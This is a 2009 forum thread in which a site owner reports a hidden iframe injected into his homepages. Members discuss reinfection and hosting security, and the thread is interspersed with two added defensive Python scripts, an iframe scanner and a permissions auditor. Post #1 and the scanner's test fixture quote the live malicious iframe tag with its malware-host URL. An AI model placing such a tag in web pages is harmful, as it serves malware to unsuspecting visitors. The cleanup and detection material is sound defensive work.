  1. #1
    bananaman is offline Senior Member
    Join Date
    Sep 2008
    Posts
    108

    warning: check for malicious code in your webpages

    Looks like my site has been the target of a hacker.

    I logged into Google Webmaster Tools this morning to read this:

    This site may be distributing malware. Google users will see a warning page when they attempt to visit pages within this site. You can visit the Google Safe Browsing diagnostic page for your site for detailed information about the problems we found.

    Sample pages that may be distributing malware:
    blah blah sample webpages from my site

    Please review StopBadware.org's Security Tips for Websites and make any necessary changes to your site. When you have cleaned your site, you can request a review, and we'll evaluate your site.


    So I checked the source code of my index.html and homepage.html pages, and lo and behold, I found this immediately after the <body> tag:

    <iframe src="http://greatnamemovie.cn:8080/ts/in.cgi?pepsi18" width=12 height=12 style="visibility: hidden"></iframe>

    This site is probably malicious. Obviously, DO NOT visit it.

    So when visitors see my site in a search listing, they also see the Google warning "This site may harm your computer." No wonder my Google traffic dropped to almost zero overnight.

    I haven't found any other pages with malicious code (but I have over 600 pages). Right now, it appears that only files named index and homepage are being targeted.

    So check your main pages, people!

    EDIT: found this info about the hack:

    WordPress › Support » Did I get hacked?
    Last edited by bananaman; 06-02-2009 at 09:21 PM. Reason: added warning not to visit malicious website
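Checking 600 pages by hand is not practical, and the injected tag is easy to miss because it is tiny and styled invisible. The script below is an added example, not code from the thread: it walks a web root and reports every iframe that points off-site and is either hidden by CSS or too small to see, which is exactly the shape of the tag quoted above. The sample pages it writes to a temporary directory are constructed for the demo (the injected tag is the one from the post; "example.com" stands in for your own domain), and nothing is fetched from the network.

```python
"""Added example: sweep a web root for hidden, off-site iframes like the one
found after <body> in the post. Constructed sample pages are written to a
temporary directory so the script runs offline; nothing is fetched."""
import os
import re
import tempfile
from urllib.parse import urlparse

# Any <iframe ...> opening tag, case-insensitive, attributes in any order.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
# name="value", name='value' or bare name=value
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(tag):
    """Lower-cased attribute dict for one opening tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def _dim(attrs, name):
    """Numeric width/height; 999 when absent or unparsable."""
    digits = re.sub(r"[^0-9]", "", attrs.get(name, ""))
    return int(digits) if digits else 999


def is_suspicious(attrs, site_hosts):
    """Off-site iframe that is hidden by CSS or too small to notice."""
    host = (urlparse(attrs.get("src", "")).hostname or "").lower()
    offsite = bool(host) and host not in site_hosts
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden = "visibility:hidden" in style or "display:none" in style
    tiny = _dim(attrs, "width") <= 20 and _dim(attrs, "height") <= 20
    return offsite and (hidden or tiny)


def scan_tree(root, site_hosts, exts=(".html", ".htm", ".php")):
    """Return sorted (relative path, line number, src) for every suspicious iframe."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                text = f.read()
            for m in IFRAME_RE.finditer(text):
                attrs = parse_attrs(m.group(0))
                if is_suspicious(attrs, site_hosts):
                    line = text.count("\n", 0, m.start()) + 1
                    findings.append((os.path.relpath(path, root), line, attrs.get("src", "")))
    return sorted(findings)


# Constructed sample pages: the injected tag from the post, and a legitimate same-site iframe.
INFECTED = ('<html><body>\n<IFRAME src="http://greatnamemovie.cn:8080/ts/in.cgi?pepsi18" '
            'width=12 height=12 style="visibility: hidden"></IFRAME>\n<h1>Home</h1></body></html>')
CLEAN = ('<html><body>\n<iframe src="http://www.example.com/embed/map.html" '
         'width="400" height="300"></iframe>\n</body></html>')


def demo():
    """Write the constructed pages to a temp dir and scan them."""
    root = tempfile.mkdtemp()
    for rel, body in (("index.html", INFECTED), ("homepage.html", INFECTED), ("about/about.html", CLEAN)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(body)
    return scan_tree(root, site_hosts={"example.com", "www.example.com"})


if __name__ == "__main__":
    for rel, line, src in demo():
        print(f"{rel}:{line}: hidden off-site iframe -> {src}")
```

Run it against a local copy of the site (`scan_tree("/path/to/webroot", {"yourdomain.com", "www.yourdomain.com"})`) rather than the live server, and keep the list of matches: if the same files come back dirty the next morning, as they did in this thread, that is the evidence to hand the host.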

  2. #2
    bananaman is offline Senior Member
    Join Date
    Sep 2008
    Posts
    108
    Oh @#$!, my Google Adsense figures jumped from:

    impressions: clicks: earnings
    304: 12: $1.63

    to

    784: 53: $10.57 in less than an hour!

    And I was only averaging 24 clicks a day!

  3. #3
    jplata is offline Junior Member
    Join Date
    Aug 2008
    Posts
    29
    Moral of story: put malicious code in your webpages.

    </joke>

  4. #4
    bananaman is offline Senior Member
    Join Date
    Sep 2008
    Posts
    108
    Well, it seems I had accidentally clicked "This Month - June" from the drop down box instead of "Today", so it was giving me the total month's (yesterday + today) earnings. Doh!

    Yesterday's figures were: 439: 39: $8.52
    Today's figures are: 352: 15: $2.13, which seems normal, actually, a bit low.

    EDIT:

    Well, I cleaned the malicious code from my webpages, then requested a review by Google.

    After a few hours, here is the result:

    "Status of the latest badware review for this site: A review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate."

    Yay! *dances*

    Last edited by bananaman; 06-03-2009 at 12:40 AM.

  5. #5
    byzantium is offline Senior Member
    Join Date
    Aug 2007
    Posts
    326
    It looks like somebody apparently got root on the web hosting server for that Wordpress hosting service, and replaced everybody's index pages with that Chinese malware site. Hopefully Wordpress has fixed the problem. I bet that a lot of people don't even know their pages have been compromised. That's one hell of a mess for Wordpress to clean up.

  6. #6
    bananaman is offline Senior Member
    Join Date
    Sep 2008
    Posts
    108
    And the scary thing is, my site has nothing to do with WordPress. The server belongs to my ISP, for its customers' personal webpages.

    And I checked my webpages this morning, and they were reinfected!

    Just got an email from my ISP saying the server isn't infected, and that probably my password was compromised.

    So I'll change the password and see what happens.

  7. #7
    PsiPro is offline Moderator
    Join Date
    Mar 2007
    Posts
    519
    Quote Originally Posted by bananaman View Post
    And the scary thing is, my site has nothing to do with WordPress. The server belongs to my ISP, for its customers' personal webpages.

    And I checked my webpages this morning, and they were reinfected!

    Just got an email from my ISP saying the server isn't infected, and that probably my password was compromised.

    So I'll change the password and see what happens.
    As a web host I get at least one of these e-mails a month.

    "My virus scanner says there is a virus on your server!" or "Why is there suddenly this run bar on my website?" etc.. etc...

    Just got an email from my ISP saying the server isn't infected, and that probably my password was compromised.
    I can tell you 9.9999billion times out of 10billion times this is not the case. The problem is almost always an out of date commercial (or worse free) script that has a known vulnerability. The people infecting your site undoubtedly have a bot that will re-infect your site until the security hole is patched.

    Now, if you do not have any script (PHP, Perl, Python, whatever) on your site, then another person on the server has the vulnerable script, and your host made a bad choice in configuring the server.

    Your web host can do a bit to protect your sites. The first and most important thing is to run scripts under the user account. It's an easy fix and will only allow an account to damage itself, at which point the host can legitimately say you did this to yourself. Providing you do not have any world-writable files (and with user-executed scripts you shouldn't), your account would be safe from other accounts on the server.

    The second method is a good set of Mod_Sec rules. These rules are designed to protect you from yourself. When a malicious user puts in a URL that looks suspicious (such as a SQL or CMDline injection) they will get an error page, and inevitably be blocked by the firewall.

    The point of the story, update your scripts, and make sure your host is doing enough to protect you.
    Brian Malinconico - @psipro

    Psi Webhosting

    Low-load business class web servers
    Discounted custom Shared, Reseller, and Dedicated plans available to YE members through PM only.
    The Aquarium Wiki
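The two conditions PsiPro describes, no world-writable files and scripts running as your own user rather than a shared web-server account, are both visible from inside the account. The script below is an added example, not code from the thread or from any host: it walks an account's tree and flags anything writable by "other" (which any neighbour on a badly configured shared box could overwrite) and anything owned by a uid other than yours (the usual sign that scripts execute as the web-server user, so files they create are not yours). It also strips the other-write bit, which is the part of the fix that is in your hands; moving script execution under your account is the host's job. The sample tree is constructed for the demo, and the ownership check assumes a POSIX system.

```python
"""Added example: audit a hosting account the way PsiPro's advice implies.
Flags (1) world-writable files and directories, which let any other account
on the box modify your pages, and (2) entries owned by a different uid, which
is what you see when scripts run as the shared web-server user instead of
under your own account. Constructed sample tree; POSIX only (os.getuid)."""
import os
import stat
import tempfile


def audit_perms(root, owner_uid=None):
    """Return sorted (kind, relative path, detail) for every problem found."""
    owner_uid = os.getuid() if owner_uid is None else owner_uid
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # link bits are meaningless; the target is checked when reached
            rel = os.path.relpath(path, root)
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:
                findings.append(("world-writable", rel, oct(mode)))
            if st.st_uid != owner_uid:
                findings.append(("foreign-owner", rel, str(st.st_uid)))
    return sorted(findings, key=lambda f: (f[0], f[1]))


def fix_world_writable(root):
    """Strip the other-write bit from everything under root; returns paths changed."""
    changed = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:
                os.chmod(path, mode & ~stat.S_IWOTH)
                changed.append(os.path.relpath(path, root))
    return sorted(changed)


def demo():
    """Constructed account: a 0666 upload script and a 0777 uploads directory."""
    root = tempfile.mkdtemp()
    files = {"index.html": 0o644, "cgi-bin/upload.php": 0o666, "uploads/.keep": 0o644}
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        os.chmod(os.path.dirname(path), 0o755)  # explicit so the demo ignores umask
        open(path, "w").close()
        os.chmod(path, mode)
    os.chmod(os.path.join(root, "uploads"), 0o777)
    before = audit_perms(root)
    fixed = fix_world_writable(root)
    after = audit_perms(root)
    return before, fixed, after


if __name__ == "__main__":
    before, fixed, after = demo()
    for kind, rel, detail in before:
        print(f"{kind}: {rel} ({detail})")
    print("fixed:", fixed)
    print("remaining:", after)
```

If `audit_perms` on your real account reports "foreign-owner" entries under a directory your scripts write to (uploads, caches, session files), the host is running scripts as a shared user, and the "run scripts under the user account" change PsiPro recommends (suEXEC, suPHP, or an equivalent) is the thing to ask them for.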

  8. #8
    byzantium is offline Senior Member
    Join Date
    Aug 2007
    Posts
    326
    Quote Originally Posted by PsiPro View Post
    As a web host I get at least one of these e-mails a month.

    "My virus scanner says there is a virus on your server!" or "Why is there suddenly this run bar on my website?" etc.. etc...
    I can tell you 9.9999 billion times out of 10 billion times this is not the case. The problem is almost always an out of date commercial (or worse free) script that has a known vulnerability. The people infecting your site undoubtedly have a bot that will re-infect your site until the security hole is patched.

    Now, if you do not have any script (PHP, Perl, Python, whatever) on your site, then another person on the server has the vulnerable script, and your host made a bad choice in configuring the server.

    Your web host can do a bit to protect your sites. The first and most important thing is to run scripts under the user account. It's an easy fix and will only allow an account to damage itself, at which point the host can legitimately say you did this to yourself. Providing you do not have any world-writable files (and with user-executed scripts you shouldn't), your account would be safe from other accounts on the server.

    The second method is a good set of Mod_Sec rules. These rules are designed to protect you from yourself. When a malicious user puts in a URL that looks suspicious (such as a SQL or CMDline injection) they will get an error page, and inevitably be blocked by the firewall.

    The point of the story, update your scripts, and make sure your host is doing enough to protect you.
    *groan*

    The Idiot Sysadmins strike again. This sort of funny business is why I am more than happy to pay Network Solutions big $$$$ for a simple webpage advertising my computer repair service. http://www.bytebustermcr.com/ Yes, they're expensive. But "cheap" is expensive in other ways. If you have a site with 600 pages, or are running an e-commerce site like most of us here, you need the best protection. I had my web designer pushing me to run my pages on his little basement server that he runs as a sideline, and I turned him down for precisely this reason.

  9. #9
    PsiPro is offline Moderator
    Join Date
    Mar 2007
    Posts
    519
    Quote Originally Posted by byzantium View Post
    The Idiot Sysadmins strike again.
    So I'm an Idiot Sysadmin for providing user level script execution and mod_security, and running a firewall?

    Edit:
    I got curious and called them. I had to be escalated until I got someone who tried to answer my questions.

    They don't run scripts as a user.
    When I asked about mod_sec type rules he referred me to the documentation on CHMOD (that's not it)
    I'm sure they run a firewall so I didn't ask.

    Again, the people I talked to didn't really know the answers, so they may or may not provide other methods of protection.
    Last edited by PsiPro; 06-04-2009 at 09:54 PM.

  10. #10
    bananaman is offline Senior Member
    Join Date
    Sep 2008
    Posts
    108
    Quote Originally Posted by PsiPro View Post
    So I'm an Idiot Sysadmin for providing user level script execution and mod_security, and running a firewall?
    I don't think byzantium was referring to you.

    Edit:
    I got curious and called them. I had to be escalated until I got someone who tried to answer my questions.

    They don't run scripts as a user.
    When I asked about mod_sec type rules he referred me to the documentation on CHMOD (that's not it)
    I'm sure they run a firewall so I didn't ask.
    Who? Network solutions?

  11. #11
    PsiPro is offline Moderator
    Join Date
    Mar 2007
    Posts
    519
    Quote Originally Posted by bananaman View Post
    I don't think byzantium was referring to you.

    Who? Network solutions?
    byzantium, I know it's hard to read attitude online; if I did, sorry, if not, I would like clarification on your comment.

    Network Solutions is one of the oldest hosting companies (that is still around). They are no doubt competent, but as was stated, they are expensive.

  12. #12
    byzantium is offline Senior Member
    Join Date
    Aug 2007
    Posts
    326
    I had presumed that, as per bananaman's comments, that the sysadmin of his server had left an easy to hack and widely known hole open on his webserver, which is how the Chinese hacker got in. I'm no longer amused by careless sysadmins leaving gaping holes in their servers for script kiddies to drive Mack trucks through. It was a general comment. Teenage hackers trade software holes like baseball cards, and the hackers find the holes long before the white hats do, and the sysadmins are the last to figure it out, all the while some 15 year old is trashing their servers. Electronic vandalism is as nasty as real world vandalism. Bananaman's experience is like arriving home every night to find the same graffiti on your fence despite painting it over, and the cops ignoring it. You'd be frustrated too.

  13. #13
    The Stealthy One is offline YE Veteran
    Join Date
    May 2006
    Posts
    3,076
    Congrats on getting it resolved. Definitely check with your Webhost. Additionally, if your site is coded in PHP or some other dynamic language, hire a security guru to check it out for any security flaws. I lost a huge file sharing site one time because some fool found a way to hack in - wasn't fun!
